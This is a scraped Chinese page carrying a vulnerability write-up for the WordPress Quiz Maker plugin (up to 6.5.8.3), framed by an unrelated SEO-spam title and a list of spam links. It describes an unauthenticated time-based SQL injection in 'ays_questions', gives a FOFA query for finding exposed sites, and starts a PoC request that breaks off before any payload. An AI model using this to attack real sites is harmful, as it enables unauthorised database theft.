当前位置: 首页 > news >正文

如何做产品销售网站网站建设常用编程语言

如何做产品销售网站,网站建设常用编程语言,网站建设程序员,私有云可以建设网站0x01 产品简介 WordPress Quiz Maker插件是一款功能强大的测验生成工具,旨在帮助用户轻松、快速地构建复杂的测验和考试。插件支持多种问题类型,包括单选框(MCQ)、复选框(MCQ)、下拉列表(MCQ)、文本、短文本、数字、日期等。还支持横幅(HTML)显示信息性消息、填空题…

0x01 产品简介

WordPress Quiz Maker插件是一款功能强大的测验生成工具,旨在帮助用户轻松、快速地构建复杂的测验和考试。插件支持多种问题类型,包括单选框(MCQ)、复选框(MCQ)、下拉列表(MCQ)、文本、短文本、数字、日期等。还支持横幅(HTML)显示信息性消息、填空题以及匹配题,让测验更加多样化和全面,适合各种规模和需求的网站使用。

0x02 漏洞概述

WordPress的Quiz Maker插件在6.5.8.3版本及以下存在基于时间的SQL注入漏洞,漏洞位于“ays_questions”参数上。由于对用户提供的参数缺乏足够的转义处理和对现有SQL查询的充分准备不足,使得未经验证的攻击者能够在已有的查询中附加额外的SQL查询,从而可能从数据库中提取敏感信息。

0x03 影响范围

Quiz Maker <= 6.5.8.3

0x04 复现环境

FOFA:"/wp-content/plugins/quiz-maker/"

0x05 漏洞复现

PoC

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWe
http://www.yayakq.cn/news/847719/

相关文章:

  • 推广引流怎么做google seo推广
  • 网站建设投标书免费wordpress303
  • 网站违法和做网站得有关系珠海网站推广排名
  • 深圳企业建站高性价比的选择百度首页关键词推广
  • 如何做网站大管家python做网站点登入没反映
  • 网站建设只有20%的利润珠海高端网站制作公司
  • 常州网站建设哪儿好薇保定中企动力怎么样
  • 公司网站首页大图怎么做晋城建设局网站
  • 做网站排名收益小程序助手官网
  • 网站首页的文字下拉怎么做wordpress后台添加侧边栏菜单
  • 信息门户网站怎么做承接工程平台
  • 网站默认首页怎么设置制作网站具体需要什么材料
  • 创建网站做搞笑视频wordpress 替换父主题函数
  • 带分页的wordpress模板谷歌seo排名公司
  • 成品网站货源入口网络科技网站建设
  • 做搜索引擎的网站怎么建立一个网站好
  • 专业网站建设新闻如何加强网站安全建设
  • 如何自己建设商城网站邯郸做小程序的网络公司
  • 做网站js是什么建筑劳务公司名字起名大全
  • 乐清市建设路小学网站外国人 做的中国字网站
  • 免费建站小程序太原建站模板网站
  • 北京西站附近的景点有哪些wordpress dux主题首页排序
  • jsp网站开发环境配置成都中风险地区
  • 网站建设是怎么赚钱的wordpress文章页版权
  • 做百度推广一定要有网站吗天天广告联盟
  • 网站规划项目与设计实例拼多多分销模式
  • 怎么给自己的网站做排名深圳建网站哪个济南兴田德润有活动吗
  • 东莞网站营销策划企业网站 带后台
  • 上海制作网站公司网站做蛋糕的英文网站
  • 深圳最好的网站制作哪家公司好大淘客网站是怎么做的